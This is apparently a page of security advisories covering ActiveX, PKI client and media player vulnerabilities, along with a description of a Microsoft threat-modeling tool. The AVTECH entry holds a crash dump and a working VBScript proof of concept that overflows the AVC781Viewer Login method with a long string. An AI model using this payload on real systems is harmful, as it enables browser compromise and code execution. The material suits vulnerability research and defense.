
Edrawsoft Security Advisories

EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC

– EDraw Flowchart ActiveX Control version 2.3 suffers from a buffer overflow vulnerability when parsing the .edd file format, resulting in an application crash and a few overwritten memory registers, which can aid the attacker to execute arbitrary code.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4935.php

——————————————–

EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)

– EDraw Flowchart ActiveX Control EDImage.OCX suffers from a denial of service vulnerability when parsing a large amount of bytes passed to the OpenDocument() function, resulting in a browser crash and unspecified memory corruption.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4936.php


AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities

Vendor: AVTECH Software, Inc.
Product Web Page: http://www.avtech.com

Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.

AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.

Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.

——————————————-

Exception Code: ACCESS_VIOLATION
Disasm: 10006C23    MOV [EAX],CL    (AVC_AX_724_VIEWER.dll)

Seh Chain:
————————————————–
1     10022F68     AVC_AX_724_VIEWER.dll
2     FC2950     VBSCRIPT.dll
3     7C839AC0     KERNEL32.dll

Called From                   Returns To
————————————————–
AVC_AX_724_VIEWER.10006C23    AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508    AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0    8244C8B

Registers:
————————————————–
EIP 10006C23
EAX BAADF06D
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: ‘$’$
EDX 00182801 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC

Block Disassembly:
————————————————–
10006C12    MOV EAX,[EBP+144]
10006C18    ADD EAX,60
10006C1B    JMP SHORT 10006C20
10006C1D    LEA ECX,[ECX]
10006C20    MOV CL,[EDX]
10006C22    INC EDX
10006C23    MOV [EAX],CL      <— CRASH
10006C25    INC EAX
10006C26    TEST CL,CL
10006C28    JNZ SHORT 10006C20
10006C2A    MOV EAX,[ESP+20]
10006C2E    ADD EAX,-10
10006C31    LEA ECX,[EAX+C]
10006C34    OR EDX,FFFFFFFF
10006C37    LOCK XADD [ECX],EDX

ArgDump:
————————————————–
EBP+8    00FE4658 -> 10044530 -> Asc: 0E0E
EBP+12    001862FC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    0018AB44 -> Uni: defaultV
EBP+20    00180A54 -> Uni: defaultV
EBP+24    00000001
EBP+28    00000001

Stack Dump:
————————————————–
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00  […………t…]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10  [….h………..]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00  [….t………..]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00  [\………….G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77  [XF……….DJ.w]

=============================================
=============================================

Proof Of Concept:
###############################

<object classid='clsid:8214B72E-B0CD-466E-A44D-1D54D926038D' id='kungfuhustle' />
<script language='vbscript'>

targetFile = "C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll"
prototype  = "Sub Login ( ByVal Username As String, ByVal Password As String, ByVal MediaType As String, ByVal ConnectType As String )"
memberName = "Login"
progid     = "AVC781Viewer.CV781Object"
argCount   = 4

arg1=String(1010, "A")
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"

kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4

</script>

More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4934.php
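
The copy loop shown in the Block Disassembly above (10006C20 to 10006C28), written out in C next to a bounded replacement, as an added example that is not part of the advisory or of AVTECH's code. `FIELD_SIZE`, `copy_bounded` and `set_username` are assumptions made for illustration; the advisory gives neither the real buffer size nor the function names.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_SIZE 64 /* assumed capacity; the advisory does not state the real one */

/* The loop at 10006C20-10006C28 as C: copy until NUL, no destination size.
 * In the dump the store faults with EAX = BAADF06D, which is 0x60 past
 * 0xBAADF00D, the pattern Windows writes into fresh heap allocations when a
 * process runs under a debugger, so the destination was not a valid buffer. */
void copy_unbounded(char *dst, const char *src)
{
    char c;
    do {
        c = *src++;      /* MOV CL,[EDX] ; INC EDX */
        *dst++ = c;      /* MOV [EAX],CL ; INC EAX */
    } while (c != '\0'); /* TEST CL,CL   ; JNZ     */
}

/* Bounded replacement: returns 0 on success, -1 if the input is rejected.
 * On rejection the destination is left as an empty string. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL) {   /* no terminator within dst_size bytes: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Hypothetical stand-in for how Login() could store its Username argument. */
int set_username(char field[FIELD_SIZE], const char *username)
{
    return copy_bounded(field, FIELD_SIZE, username);
}

int main(void)
{
    char field[FIELD_SIZE], longname[1011];
    memset(longname, 'A', 1010); /* constructed: same length as arg1 above */
    longname[1010] = '\0';
    printf("defaultV -> %d\n", set_username(field, "defaultV"));
    printf("1010 x A -> %d\n", set_username(field, longname));
    return 0;
}
```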

Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corruption PoC

Summary

The eToken PKI Client is the software that enables eToken USB operation and the implementation of eToken PKI-based solutions. These solutions include certificate-based strong two-factor authentication, encryption and digital signing. With the PKI Client your PKI solutions become highly secure, extremely convenient and portable, as you can easily and securely generate and store PKI keys on-board eToken smart card-based devices.

Description

eToken PKI Client is prone to an unspecified memory-corruption vulnerability. An attacker can exploit this issue by tricking a victim into opening a malicious ETV file to execute arbitrary code and to cause denial-of-service conditions.


More info: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4933.php

J. River Media Jukebox 12 MP3 File Handling Remote Heap Overflow PoC

Media Jukebox 12 is a media player application for playing various media files on a Windows machine.

Desc: Media Jukebox 12 suffers from a heap overflow vulnerability when processing .mp3 files and their metadata (ID3 tags). When a malicious .mp3 file is played, the application pops up an error message and crashes. The ECX register gets overwritten, giving the attacker the possibility of system access remotely or locally.

More Info: http://zeroscience.mk/mk/vulnerabilities/ZSL-2010-4930.php

Microsoft Threat Analysis and Modeling Tool

The core function of Microsoft's Threat Analysis & Modeling tool (v2.1 or v3.0 beta) is to identify threats, while facilitating the process of defining a security strategy. Even if you are not a security subject-matter expert, you now have the ability to consistently and objectively identify threats to your software application.

Creating a threat model using the Microsoft Application Security Threat Analysis & Modeling tool is a three-phase process. First, you define your application context. Second, you model your threats on top of your application context. Third, you measure the risk that is associated with each threat. Once you have completed these phases, you can assimilate your threat models through analytics, visualizations, and reports.

The Threat Analysis & Modeling tool automatically generates potential threats to your software application, based solely on known information that you provide. The Threat Analysis & Modeling tool also has the capability to assimilate the information you provide to build security artifacts such as access control matrices, data flow and trust flow diagrams, and focused, customizable reports.

Taken from Getting Started.rtf within the application.

More info: http://blogs.msdn.com/threatmodeling/